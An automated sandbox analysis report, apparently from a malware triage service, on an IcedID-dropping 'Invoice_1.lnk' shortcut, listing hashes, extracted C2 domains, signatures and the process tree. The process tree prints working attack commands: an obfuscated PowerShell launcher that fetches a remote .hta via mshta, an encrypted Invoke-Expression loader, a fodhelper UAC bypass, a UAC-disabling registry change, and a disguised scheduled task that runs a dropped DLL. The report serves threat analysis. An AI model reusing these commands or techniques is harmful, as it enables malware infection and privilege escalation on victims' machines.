Analysis
-
max time kernel
71s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 14:15
Static task
static1
Behavioral task
behavioral1
Sample
Invoice_1.lnk
Resource
win7-20220414-en
General
-
Target
Invoice_1.lnk
-
Size
2KB
-
MD5
c00c67f3de031c5ae198ba0362b5dd01
-
SHA1
40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
-
SHA256
d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
-
SHA512
4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad
Malware Config
Extracted
https://conderadio.tv/09872574.hta
Extracted
icedid
109932505
ilekvoyn.com
Signatures
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exepowershell.exeRundll32.exeflow pid process 8 4692 mshta.exe 10 4692 mshta.exe 24 4620 powershell.exe 40 3780 Rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
Rundll32.exepid process 3780 Rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 11 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ZDqcC.bat" powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kywdT.bat" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open powershell.exe Key deleted \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command powershell.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeRundll32.exepid process 3452 powershell.exe 3452 powershell.exe 4620 powershell.exe 4620 powershell.exe 3420 powershell.exe 3420 powershell.exe 1272 powershell.exe 1272 powershell.exe 3780 Rundll32.exe 3780 Rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3452 powershell.exe Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 3420 powershell.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeIncreaseQuotaPrivilege 1272 powershell.exe Token: SeSecurityPrivilege 1272 powershell.exe Token: SeTakeOwnershipPrivilege 1272 powershell.exe Token: SeLoadDriverPrivilege 1272 powershell.exe Token: SeSystemProfilePrivilege 1272 powershell.exe Token: SeSystemtimePrivilege 1272 powershell.exe Token: SeProfSingleProcessPrivilege 1272 powershell.exe Token: SeIncBasePriorityPrivilege 1272 powershell.exe Token: SeCreatePagefilePrivilege 1272 powershell.exe Token: SeBackupPrivilege 1272 powershell.exe Token: SeRestorePrivilege 1272 powershell.exe Token: SeShutdownPrivilege 1272 powershell.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeSystemEnvironmentPrivilege 1272 powershell.exe Token: SeRemoteShutdownPrivilege 1272 powershell.exe Token: SeUndockPrivilege 1272 powershell.exe Token: SeManageVolumePrivilege 1272 powershell.exe Token: 33 1272 powershell.exe Token: 34 1272 powershell.exe Token: 35 1272 powershell.exe Token: 36 1272 powershell.exe Token: SeIncreaseQuotaPrivilege 1272 powershell.exe Token: SeSecurityPrivilege 1272 powershell.exe Token: SeTakeOwnershipPrivilege 1272 powershell.exe Token: SeLoadDriverPrivilege 1272 powershell.exe Token: SeSystemProfilePrivilege 1272 powershell.exe Token: SeSystemtimePrivilege 1272 powershell.exe Token: SeProfSingleProcessPrivilege 1272 powershell.exe Token: SeIncBasePriorityPrivilege 1272 powershell.exe Token: SeCreatePagefilePrivilege 1272 powershell.exe Token: SeBackupPrivilege 1272 powershell.exe Token: SeRestorePrivilege 1272 powershell.exe Token: SeShutdownPrivilege 1272 powershell.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeSystemEnvironmentPrivilege 1272 powershell.exe Token: SeRemoteShutdownPrivilege 1272 powershell.exe Token: SeUndockPrivilege 1272 powershell.exe Token: SeManageVolumePrivilege 1272 powershell.exe Token: 33 1272 powershell.exe Token: 34 1272 powershell.exe Token: 35 1272 powershell.exe Token: 36 1272 powershell.exe Token: SeIncreaseQuotaPrivilege 1272 powershell.exe Token: SeSecurityPrivilege 1272 powershell.exe Token: SeTakeOwnershipPrivilege 1272 powershell.exe Token: SeLoadDriverPrivilege 1272 powershell.exe Token: SeSystemProfilePrivilege 1272 powershell.exe Token: SeSystemtimePrivilege 1272 powershell.exe Token: SeProfSingleProcessPrivilege 1272 powershell.exe Token: SeIncBasePriorityPrivilege 1272 powershell.exe Token: SeCreatePagefilePrivilege 1272 powershell.exe Token: SeBackupPrivilege 1272 powershell.exe Token: SeRestorePrivilege 1272 powershell.exe Token: SeShutdownPrivilege 1272 powershell.exe Token: SeDebugPrivilege 1272 powershell.exe Token: SeSystemEnvironmentPrivilege 1272 powershell.exe Token: SeRemoteShutdownPrivilege 1272 powershell.exe Token: SeUndockPrivilege 1272 powershell.exe Token: SeManageVolumePrivilege 1272 powershell.exe Token: 33 1272 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Rundll32.exepid process 3780 Rundll32.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.exemshta.exepowershell.exefodhelper.execmd.execmd.exefodhelper.execmd.execmd.exedescription pid process target process PID 1640 wrote to memory of 3452 1640 cmd.exe powershell.exe PID 1640 wrote to memory of 3452 1640 cmd.exe powershell.exe PID 3452 wrote to memory of 4692 3452 powershell.exe mshta.exe PID 3452 wrote to memory of 4692 3452 powershell.exe mshta.exe PID 4692 wrote to memory of 4620 4692 mshta.exe powershell.exe PID 4692 wrote to memory of 4620 4692 mshta.exe powershell.exe PID 4620 wrote to memory of 1964 4620 powershell.exe fodhelper.exe PID 4620 wrote to memory of 1964 4620 powershell.exe fodhelper.exe PID 1964 wrote to memory of 4896 1964 fodhelper.exe cmd.exe PID 1964 wrote to memory of 4896 1964 fodhelper.exe cmd.exe PID 4896 wrote to memory of 2004 4896 cmd.exe cmd.exe PID 4896 wrote to memory of 2004 4896 cmd.exe cmd.exe PID 2004 wrote to memory of 3420 2004 cmd.exe powershell.exe PID 2004 wrote to memory of 3420 2004 cmd.exe powershell.exe PID 2004 wrote to memory of 3464 2004 cmd.exe cmd.exe PID 2004 wrote to memory of 3464 2004 cmd.exe cmd.exe PID 4620 wrote to memory of 4092 4620 powershell.exe fodhelper.exe PID 4620 wrote to memory of 4092 4620 powershell.exe fodhelper.exe PID 4092 wrote to memory of 4760 4092 fodhelper.exe cmd.exe PID 4092 wrote to memory of 4760 4092 fodhelper.exe cmd.exe PID 4760 wrote to memory of 3148 4760 cmd.exe cmd.exe PID 4760 wrote to memory of 3148 4760 cmd.exe cmd.exe PID 3148 wrote to memory of 1272 3148 cmd.exe powershell.exe PID 3148 wrote to memory of 1272 3148 cmd.exe powershell.exe PID 3148 wrote to memory of 2160 3148 cmd.exe cmd.exe PID 3148 wrote to memory of 2160 3148 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ekPb = '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';$tPFOxUIgHD = 'U3FHZEtYZHBWcHZaQ09TR1JSell1ZmhUWktOemhReEc=';$CBMKxSfhg = New-Object 'System.Security.Cryptography.AesManaged';$CBMKxSfhg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CBMKxSfhg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CBMKxSfhg.BlockSize = 128;$CBMKxSfhg.KeySize = 256;$CBMKxSfhg.Key = [System.Convert]::FromBase64String($tPFOxUIgHD);$ddnEW = [System.Convert]::FromBase64String($ekPb);$kAbSPqMWQ = $ddnEW[0..15];$CBMKxSfhg.IV = $kAbSPqMWQ;$AUXAiVjEXOpkNt = $CBMKxSfhg.CreateDecryptor();$XPnBMtsJXxDfbSw = $AUXAiVjEXOpkNt.TransformFinalBlock($ddnEW, 16, $ddnEW.Length - 16);$CBMKxSfhg.Dispose();$GDDbozdXrwaw = New-Object System.IO.MemoryStream( , $XPnBMtsJXxDfbSw );$DuRHh = New-Object System.IO.MemoryStream;$qYlxsgnfBTqatvQswW = New-Object System.IO.Compression.GzipStream $GDDbozdXrwaw, ([IO.Compression.CompressionMode]::Decompress);$qYlxsgnfBTqatvQswW.CopyTo( $DuRHh );$qYlxsgnfBTqatvQswW.Close();$GDDbozdXrwaw.Close();[byte[]] $qDmVNkk = $DuRHh.ToArray();$liVTzN = [System.Text.Encoding]::UTF8.GetString($qDmVNkk);Invoke-Expression($liVTzN)4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" *7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 08⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c del "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat"8⤵
-
C:\Windows\System32\fodhelper.exe"C:\Windows\System32\fodhelper.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kywdT.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\kywdT.bat" *7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = 'Core update check'; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL C:\Users\Admin\AppData\Local\Temp\1.dll8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c del "C:\Users\Admin\AppData\Local\Temp\kywdT.bat"8⤵
-
C:\Windows\system32\Rundll32.exeRundll32.exe C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD545c815f0a0e10f75c450369e5b8673f9
SHA1b3f8e50200afefd0e4c271c3de84ef4d93c5f6c9
SHA2564bd75d9f94626d1a4b514515dfa9c1abfca3d5a1a36f4d1f0dfb8489db453a97
SHA5120120c1f3c501c0630c931f873794f6c7ef1e87216b95aaf76479dfff1614020a7de38c62a24f92a82ae1b0a55b041308d24390b6f556c62d535bef938e4f6974
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5331841fe482ffe8b1cc1509733d8ca67
SHA11e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
SHA25614112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
SHA512039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5331841fe482ffe8b1cc1509733d8ca67
SHA11e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
SHA25614112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
SHA512039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
-
C:\Users\Admin\AppData\Local\Temp\1.dllFilesize
718KB
MD55a0e570b13623c79c9261a8a2cc41f04
SHA110f6f208907d25f5ec39060a8576ed8387d42c0e
SHA2563dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
SHA512bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
-
C:\Users\Admin\AppData\Local\Temp\1.dllFilesize
718KB
MD55a0e570b13623c79c9261a8a2cc41f04
SHA110f6f208907d25f5ec39060a8576ed8387d42c0e
SHA2563dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
SHA512bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
-
C:\Users\Admin\AppData\Local\Temp\ZDqcC.batFilesize
343B
MD58ca0985471c9c17826fab97b90f90c2e
SHA16dfd1040096a2215be242e4392d7a2768d067f10
SHA256f9a6e829c29a8411f88db8a26edc1fafe70c64b0df651ad359ca944b14a17781
SHA512539d65d7e7676e3a030de37e1339c2ddb0077db3242d42e6497c66f1bc8f9fc60a00150d8c29ade40c6845e1733f4f2d4cb9f830d09969676f1d24834767cefb
-
C:\Users\Admin\AppData\Local\Temp\kywdT.batFilesize
692B
MD5a9338ee7f2e9643871e016eda0ecbe1f
SHA166c6dc3bcd948645774778263e7c8069e340e704
SHA256c3eecc22513eb86b258dc0bfe97a599c9c5673d86fb2d2b286a88d113f076813
SHA5127cb76b9cfdb41e3640bbec245324ba4c05757c84d0dec7d36320ce6836a2a7868727a7add4b0b49e9126f6b3233d18c2e31649ef4015769248f6101211f4853f
-
memory/1272-153-0x00007FFC2C480000-0x00007FFC2CF41000-memory.dmpFilesize
10.8MB
-
memory/1272-150-0x0000000000000000-mapping.dmp
-
memory/1964-139-0x0000000000000000-mapping.dmp
-
memory/2004-142-0x0000000000000000-mapping.dmp
-
memory/2160-154-0x0000000000000000-mapping.dmp
-
memory/3148-149-0x0000000000000000-mapping.dmp
-
memory/3420-143-0x0000000000000000-mapping.dmp
-
memory/3420-144-0x00007FFC2C480000-0x00007FFC2CF41000-memory.dmpFilesize
10.8MB
-
memory/3452-130-0x0000000000000000-mapping.dmp
-
memory/3452-132-0x00007FFC2E530000-0x00007FFC2EFF1000-memory.dmpFilesize
10.8MB
-
memory/3452-131-0x00000225DE9F0000-0x00000225DEA12000-memory.dmpFilesize
136KB
-
memory/3464-145-0x0000000000000000-mapping.dmp
-
memory/3780-157-0x0000000180000000-0x0000000180009000-memory.dmpFilesize
36KB
-
memory/4092-146-0x0000000000000000-mapping.dmp
-
memory/4620-137-0x00007FFC2C480000-0x00007FFC2CF41000-memory.dmpFilesize
10.8MB
-
memory/4620-135-0x0000000000000000-mapping.dmp
-
memory/4692-133-0x0000000000000000-mapping.dmp
-
memory/4760-147-0x0000000000000000-mapping.dmp
-
memory/4896-140-0x0000000000000000-mapping.dmp